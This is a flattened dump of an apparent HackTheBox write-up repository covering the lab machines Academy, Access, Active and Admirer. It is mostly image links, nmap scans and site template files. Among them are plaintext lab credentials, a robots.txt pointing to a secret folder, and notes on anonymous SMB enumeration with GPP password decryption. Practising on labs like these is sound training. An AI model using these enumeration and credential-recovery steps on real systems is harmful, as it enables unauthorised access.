/Academy/images/privesc_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/privesc_2.png
--------------------------------------------------------------------------------
/Academy/images/root.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/root.png
--------------------------------------------------------------------------------
/Academy/images/root_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/root_1.png
--------------------------------------------------------------------------------
/Academy/images/root_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/root_2.png
--------------------------------------------------------------------------------
/Academy/images/shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/shell.png
--------------------------------------------------------------------------------
/Academy/images/sql_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/sql_1.png
--------------------------------------------------------------------------------
/Academy/images/sql_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/sql_2.png
--------------------------------------------------------------------------------
/Academy/images/sql_3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/sql_3.png
--------------------------------------------------------------------------------
/Academy/images/sql_4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/sql_4.png
--------------------------------------------------------------------------------
/Academy/images/sql_5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/sql_5.png
--------------------------------------------------------------------------------
/Academy/images/sql_6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/sql_6.png
--------------------------------------------------------------------------------
/Academy/images/user.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/user.png
--------------------------------------------------------------------------------
/Academy/images/user_password.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/user_password.png
--------------------------------------------------------------------------------
/Academy/images/user_privesc_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/user_privesc_2.png
--------------------------------------------------------------------------------
/Academy/images/website_admin_login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/website_admin_login.png
--------------------------------------------------------------------------------
/Academy/images/website_admin_panel.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/website_admin_panel.png
--------------------------------------------------------------------------------
/Academy/images/website_main_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/website_main_1.png
--------------------------------------------------------------------------------
/Academy/images/website_main_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/website_main_2.png
--------------------------------------------------------------------------------
/Academy/images/website_register.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/website_register.png
--------------------------------------------------------------------------------
/Academy/images/website_user_panel.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Academy/images/website_user_panel.png
--------------------------------------------------------------------------------
/Access/files/Access Control.pst:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Access/files/Access Control.pst
--------------------------------------------------------------------------------
/Access/files/Access Control.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Access/files/Access Control.zip
--------------------------------------------------------------------------------
/Access/files/backup.mdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Access/files/backup.mdb
--------------------------------------------------------------------------------
/Access/files/nmap/initial.gnmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.01 scan initiated Sun Nov 4 14:36:32 2018 as: nmap -sV -sC -oA nmap/initial access
2 | Host: 10.10.10.98 (access) Status: Up
3 | Host: 10.10.10.98 (access) Ports: 21/open/tcp//ftp//Microsoft ftpd/, 23/open/tcp//telnet?///, 80/open/tcp//http//Microsoft IIS httpd 7.5/ Ignored State: filtered (997)
4 | # Nmap done at Sun Nov 4 14:39:24 2018 -- 1 IP address (1 host up) scanned in 171.78 seconds
5 |
--------------------------------------------------------------------------------
/Access/images/auth_user.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Access/images/auth_user.png
--------------------------------------------------------------------------------
/Access/images/cmd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Access/images/cmd.png
--------------------------------------------------------------------------------
/Access/images/ftp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Access/images/ftp.png
--------------------------------------------------------------------------------
/Access/images/mail.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Access/images/mail.png
--------------------------------------------------------------------------------
/Access/images/root.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Access/images/root.png
--------------------------------------------------------------------------------
/Access/images/user.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Access/images/user.png
--------------------------------------------------------------------------------
/Access/images/visual_interface.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Access/images/visual_interface.png
--------------------------------------------------------------------------------
/Access/images/website.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Access/images/website.png
--------------------------------------------------------------------------------
/Active/files/Groups.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Active/files/notes.txt:
--------------------------------------------------------------------------------
1 |
2 | smbclient -N -L //10.10.10.100
3 |
4 |
5 | /run/user/1000/gvfs/smb-share:server=10.10.10.100,share=replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE$ cat Pre
6 | ferences/Groups/Groups.xml
7 |
8 | git clone https://github.com/BustedSec/gpp-decrypt
9 |
10 | vim gpp-decrypt.rb #to change encrypted string
11 |
12 | parallels@ubuntu:~/Desktop/Active/gpp-decrypt$ ruby gpp-decrypt.rb
13 | GPPstillStandingStrong2k18
14 |
--------------------------------------------------------------------------------
/Active/images/root_mnt.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Active/images/root_mnt.png
--------------------------------------------------------------------------------
/Active/images/root_pwd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Active/images/root_pwd.png
--------------------------------------------------------------------------------
/Active/images/root_shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Active/images/root_shell.png
--------------------------------------------------------------------------------
/Active/images/user.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Active/images/user.png
--------------------------------------------------------------------------------
/Admirer/files/contacts.txt:
--------------------------------------------------------------------------------
1 | ##########
2 | # admins #
3 | ##########
4 | # Penny
5 | Email: p.wise@admirer.htb
6 |
7 |
8 | ##############
9 | # developers #
10 | ##############
11 | # Rajesh
12 | Email: r.nayyar@admirer.htb
13 |
14 | # Amy
15 | Email: a.bialik@admirer.htb
16 |
17 | # Leonard
18 | Email: l.galecki@admirer.htb
19 |
20 |
21 |
22 | #############
23 | # designers #
24 | #############
25 | # Howard
26 | Email: h.helberg@admirer.htb
27 |
28 | # Bernadette
29 | Email: b.rauch@admirer.htb
30 |
--------------------------------------------------------------------------------
/Admirer/files/credentials.txt:
--------------------------------------------------------------------------------
1 | [Bank Account]
2 | waldo.11
3 | Ezy]m27}OREc$
4 |
5 | [Internal mail account]
6 | w.cooper@admirer.htb
7 | fgJr6q#S\W:$P
8 |
9 | [FTP account]
10 | ftpuser
11 | %n?4Wz}R$tTF7
12 |
13 | [Wordpress account]
14 | admin
15 | w0rdpr3ss01!
16 |
--------------------------------------------------------------------------------
/Admirer/files/html.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html.tar.gz
--------------------------------------------------------------------------------
/Admirer/files/html/assets/css/images/arrow.svg:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Admirer/files/html/assets/css/images/close.svg:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Admirer/files/html/assets/css/images/spinner.svg:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Admirer/files/html/assets/css/noscript.css:
--------------------------------------------------------------------------------
1 | /*
2 | Multiverse by HTML5 UP
3 | html5up.net | @ajlkn
4 | Free for personal and commercial use under the CCA 3.0 license (html5up.net/license)
5 | */
6 |
7 | /* Wrapper */
8 |
9 | body.is-preload #wrapper:before {
10 | display: none;
11 | }
12 |
13 | /* Main */
14 |
15 | body.is-preload #main .thumb {
16 | pointer-events: auto;
17 | opacity: 1;
18 | }
19 |
20 | /* Header */
21 |
22 | body.is-preload #header {
23 | -moz-transform: none;
24 | -webkit-transform: none;
25 | -ms-transform: none;
26 | transform: none;
27 | }
--------------------------------------------------------------------------------
/Admirer/files/html/assets/sass/components/_icons.scss:
--------------------------------------------------------------------------------
1 | ///
2 | /// Multiverse by HTML5 UP
3 | /// html5up.net | @ajlkn
4 | /// Free for personal and commercial use under the CCA 3.0 license (html5up.net/license)
5 | ///
6 |
7 | /* Icons */
8 |
9 | ul.icons {
10 | cursor: default;
11 | list-style: none;
12 | padding-left: 0;
13 |
14 | li {
15 | display: inline-block;
16 | padding: 0 1em 0 0;
17 |
18 | &:last-child {
19 | padding-right: 0;
20 | }
21 |
22 | .icon {
23 | color: _palette(fg-light);
24 |
25 | &:before {
26 | font-size: 1.5em;
27 | }
28 | }
29 | }
30 | }
--------------------------------------------------------------------------------
/Admirer/files/html/assets/sass/layout/_footer.scss:
--------------------------------------------------------------------------------
1 | ///
2 | /// Multiverse by HTML5 UP
3 | /// html5up.net | @ajlkn
4 | /// Free for personal and commercial use under the CCA 3.0 license (html5up.net/license)
5 | ///
6 |
7 | /* Footer */
8 |
9 | #footer {
10 | .copyright {
11 | color: _palette(fg-light);
12 | font-size: 0.9em;
13 |
14 | a {
15 | color: inherit;
16 | }
17 | }
18 | }
--------------------------------------------------------------------------------
/Admirer/files/html/assets/webfonts/fa-brands-400.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/assets/webfonts/fa-brands-400.eot
--------------------------------------------------------------------------------
/Admirer/files/html/assets/webfonts/fa-brands-400.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/assets/webfonts/fa-brands-400.ttf
--------------------------------------------------------------------------------
/Admirer/files/html/assets/webfonts/fa-brands-400.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/assets/webfonts/fa-brands-400.woff
--------------------------------------------------------------------------------
/Admirer/files/html/assets/webfonts/fa-brands-400.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/assets/webfonts/fa-brands-400.woff2
--------------------------------------------------------------------------------
/Admirer/files/html/assets/webfonts/fa-regular-400.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/assets/webfonts/fa-regular-400.eot
--------------------------------------------------------------------------------
/Admirer/files/html/assets/webfonts/fa-regular-400.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/assets/webfonts/fa-regular-400.ttf
--------------------------------------------------------------------------------
/Admirer/files/html/assets/webfonts/fa-regular-400.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/assets/webfonts/fa-regular-400.woff
--------------------------------------------------------------------------------
/Admirer/files/html/assets/webfonts/fa-regular-400.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/assets/webfonts/fa-regular-400.woff2
--------------------------------------------------------------------------------
/Admirer/files/html/assets/webfonts/fa-solid-900.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/assets/webfonts/fa-solid-900.eot
--------------------------------------------------------------------------------
/Admirer/files/html/assets/webfonts/fa-solid-900.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/assets/webfonts/fa-solid-900.ttf
--------------------------------------------------------------------------------
/Admirer/files/html/assets/webfonts/fa-solid-900.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/assets/webfonts/fa-solid-900.woff
--------------------------------------------------------------------------------
/Admirer/files/html/assets/webfonts/fa-solid-900.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/assets/webfonts/fa-solid-900.woff2
--------------------------------------------------------------------------------
/Admirer/files/html/images/fulls/arch01.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/fulls/arch01.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/fulls/arch02.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/fulls/arch02.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/fulls/art01.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/fulls/art01.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/fulls/art02.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/fulls/art02.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/fulls/eng01.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/fulls/eng01.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/fulls/eng02.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/fulls/eng02.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/fulls/mind01.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/fulls/mind01.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/fulls/mind02.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/fulls/mind02.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/fulls/mus01.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/fulls/mus01.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/fulls/mus02.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/fulls/mus02.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/fulls/nat01.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/fulls/nat01.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/fulls/nat02.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/fulls/nat02.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/thumbs/thmb_arch01.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/thumbs/thmb_arch01.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/thumbs/thmb_arch02.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/thumbs/thmb_arch02.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/thumbs/thmb_art01.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/thumbs/thmb_art01.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/thumbs/thmb_art02.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/thumbs/thmb_art02.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/thumbs/thmb_eng01.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/thumbs/thmb_eng01.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/thumbs/thmb_eng02.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/thumbs/thmb_eng02.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/thumbs/thmb_mind01.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/thumbs/thmb_mind01.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/thumbs/thmb_mind02.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/thumbs/thmb_mind02.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/thumbs/thmb_mus01.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/thumbs/thmb_mus01.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/thumbs/thmb_mus02.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/thumbs/thmb_mus02.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/thumbs/thmb_nat01.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/thumbs/thmb_nat01.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/images/thumbs/thmb_nat02.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/files/html/images/thumbs/thmb_nat02.jpg
--------------------------------------------------------------------------------
/Admirer/files/html/robots.txt:
--------------------------------------------------------------------------------
1 | User-agent: *
2 |
3 | # This folder contains personal stuff, so no one (not even robots!) should see it - waldo
4 | Disallow: /w4ld0s_s3cr3t_d1r
5 |
--------------------------------------------------------------------------------
/Admirer/files/html/utility-scripts/db_admin.php:
--------------------------------------------------------------------------------
1 | connect_error) {
11 | die("Connection failed: " . $conn->connect_error);
12 | }
13 | echo "Connected successfully";
14 |
15 |
16 | // TODO: Finish implementing this or find a better open source alternative
17 | ?>
18 |
--------------------------------------------------------------------------------
/Admirer/files/html/utility-scripts/info.php:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Admirer/files/html/utility-scripts/phptest.php:
--------------------------------------------------------------------------------
1 |
4 |
--------------------------------------------------------------------------------
/Admirer/files/html/w4ld0s_s3cr3t_d1r/contacts.txt:
--------------------------------------------------------------------------------
1 | ##########
2 | # admins #
3 | ##########
4 | # Penny
5 | Email: p.wise@admirer.htb
6 |
7 |
8 | ##############
9 | # developers #
10 | ##############
11 | # Rajesh
12 | Email: r.nayyar@admirer.htb
13 |
14 | # Amy
15 | Email: a.bialik@admirer.htb
16 |
17 | # Leonard
18 | Email: l.galecki@admirer.htb
19 |
20 |
21 |
22 | #############
23 | # designers #
24 | #############
25 | # Howard
26 | Email: h.helberg@admirer.htb
27 |
28 | # Bernadette
29 | Email: b.rauch@admirer.htb
30 |
--------------------------------------------------------------------------------
/Admirer/files/html/w4ld0s_s3cr3t_d1r/credentials.txt:
--------------------------------------------------------------------------------
1 | [Bank Account]
2 | waldo.11
3 | Ezy]m27}OREc$
4 |
5 | [Internal mail account]
6 | w.cooper@admirer.htb
7 | fgJr6q#S\W:$P
8 |
9 | [FTP account]
10 | ftpuser
11 | %n?4Wz}R$tTF7
12 |
13 | [Wordpress account]
14 | admin
15 | w0rdpr3ss01!
16 |
--------------------------------------------------------------------------------
/Admirer/files/nmap/all.gnmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.70 scan initiated Mon May 25 19:17:36 2020 as: nmap -p- -sV -sC -oA nmap/all 10.10.10.187
2 | Host: 10.10.10.187 (10.10.10.187) Status: Up
3 | Host: 10.10.10.187 (10.10.10.187) Ports: 21/open/tcp//ftp//vsftpd 3.0.3/, 22/open/tcp//ssh//OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.25 ((Debian))/ Ignored State: closed (65532)
4 | # Nmap done at Mon May 25 19:35:29 2020 -- 1 IP address (1 host up) scanned in 1072.95 seconds
5 |
--------------------------------------------------------------------------------
/Admirer/files/nmap/all_again.gnmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.70 scan initiated Tue May 26 11:49:14 2020 as: nmap -p- -sV -sC -oA nmap/all_again admirer.htb
2 | Host: 10.10.10.187 (admirer.htb) Status: Up
3 | Host: 10.10.10.187 (admirer.htb) Ports: 21/open/tcp//ftp//vsftpd 3.0.3/, 22/open/tcp//ssh//OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.25 ((Debian))/ Ignored State: closed (65532)
4 | # Nmap done at Tue May 26 12:02:57 2020 -- 1 IP address (1 host up) scanned in 822.78 seconds
5 |
--------------------------------------------------------------------------------
/Admirer/files/nmap/initial.gnmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.70 scan initiated Mon May 25 19:17:13 2020 as: nmap -sV -sC -oA nmap/initial 10.10.10.187
2 | Host: 10.10.10.187 (10.10.10.187) Status: Up
3 | Host: 10.10.10.187 (10.10.10.187) Ports: 21/open/tcp//ftp//vsftpd 3.0.3/, 22/open/tcp//ssh//OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.25 ((Debian))/ Ignored State: closed (997)
4 | # Nmap done at Mon May 25 19:17:35 2020 -- 1 IP address (1 host up) scanned in 22.06 seconds
5 |
--------------------------------------------------------------------------------
/Admirer/images/adminer.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/adminer.png
--------------------------------------------------------------------------------
/Admirer/images/adminer0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/adminer0.png
--------------------------------------------------------------------------------
/Admirer/images/adminer05.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/adminer05.png
--------------------------------------------------------------------------------
/Admirer/images/adminer1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/adminer1.png
--------------------------------------------------------------------------------
/Admirer/images/adminer15.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/adminer15.png
--------------------------------------------------------------------------------
/Admirer/images/adminer2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/adminer2.png
--------------------------------------------------------------------------------
/Admirer/images/adminer4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/adminer4.png
--------------------------------------------------------------------------------
/Admirer/images/adminer5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/adminer5.png
--------------------------------------------------------------------------------
/Admirer/images/adminer6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/adminer6.png
--------------------------------------------------------------------------------
/Admirer/images/adminer7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/adminer7.png
--------------------------------------------------------------------------------
/Admirer/images/adminer8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/adminer8.png
--------------------------------------------------------------------------------
/Admirer/images/adminer9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/adminer9.png
--------------------------------------------------------------------------------
/Admirer/images/brute2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/brute2.png
--------------------------------------------------------------------------------
/Admirer/images/db-credentials.png:
--------------------------------------------------------------------------------
